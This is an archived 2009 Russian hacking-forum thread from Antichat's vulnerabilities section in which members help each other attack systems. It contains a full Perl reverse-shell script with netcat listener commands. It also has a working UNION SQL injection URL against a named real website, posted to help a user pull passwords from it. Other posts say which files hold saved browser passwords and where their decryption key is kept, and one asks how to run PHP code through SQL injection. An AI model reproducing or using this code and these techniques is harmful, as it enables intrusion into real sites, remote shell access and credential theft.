HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.08.2009, 02:13
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Не, не надо, уже были преценденты, плохо кончалось. Лучше вот, пройди в тему автора и задай там свой вопрос:

https://forum.antichat.ru/thread103155.html

Код:
 nc.exe sitename 777
O_o

Последний раз редактировалось Pashkela; 11.08.2009 в 02:15..
 
Ответить с цитированием

  #2  
Старый 11.08.2009, 07:03
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами: 9328706

Репутация: 1503
По умолчанию

Цитата:
Почему на всех моих веб шеллах не открвается порт для конекта нетката?
И подскажите как юзать неткат в режиме backconnect через дедик
Лучше юзай просто бекконект? Например такой:
Код:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Еще у тебя на дедике должен быть так называемый "белый IP", далее ты запускаешь на сервере вышеприведенный скрипт, а на дедике nc.exe -l -v -p 443, еще может быть решением проблемы бекконект на 80 порт, либо 443.
А еще лучше под эти цели юзать не дедик, а vds например, конектишься по ссш, и там открываешь неткат ./nc -l -v -p 443
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #3  
Старый 11.08.2009, 19:18
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
 
Ответить с цитированием

  #4  
Старый 11.08.2009, 19:27
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от borntobebad  
http://caryscars.be/index.php?item=detailsid=10 split4 ne pomogaet . Proboval vitashit password cherez blinde sql ijnection no ne poluchilos vitashil tolko user name : carycars@localhost
versija mysql : 5.0.5

pomogite vitashit password , jelatelno pokazat kak sdelali chtob mojno bilo praktekanutsa , ya v blind sql ne bum bum
тут не блинд
Код:
http://caryscars.be/index.php?item=details&id=-150+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16--
 
Ответить с цитированием

  #5  
Старый 11.08.2009, 19:50
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

a pochemu split4 ne naxodit pole vvoda ?
 
Ответить с цитированием

  #6  
Старый 11.08.2009, 19:53
borntobebad
Новичок
Регистрация: 23.03.2009
Сообщений: 14
С нами: 9018815

Репутация: 0
По умолчанию

razobralsa . Split4 pashit .
 
Ответить с цитированием

  #7  
Старый 11.08.2009, 21:54
noozike69
Новичок
Регистрация: 06.07.2009
Сообщений: 4
С нами: 8867850

Репутация: 0
По умолчанию

может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
 
Ответить с цитированием

  #8  
Старый 11.08.2009, 23:15
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами: 9196401

Репутация: 930
По умолчанию

Цитата:
Сообщение от noozike69  
может не оп теме,но вот : как называется файл каторый хранит сохраненные пароли от Mozilla Firefox и oper'ы???
Opera хранит пароли в wand.dat
Firefox - в файле signons3.txt , для расшифровки нужен файл key3.db. Оба файла находятся в профиле

Последний раз редактировалось z00MAN; 11.08.2009 в 23:23..
 
Ответить с цитированием

  #9  
Старый 12.08.2009, 02:46
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию

как через mysql inj выполнить php код,если могу добовлять записи в бд,но они фильтруются.добовляю <?system(ls);?>
вот что добовляется в бд &lt;?system(ls);?&gt;.
Ну и при выводе не выполняется.Можн какнить сделать?
 
Ответить с цитированием

  #10  
Старый 11.08.2009, 22:00
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
С нами: 9466141

Репутация: 74
По умолчанию

в Mozilla formhistory.sqlite вроде как....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.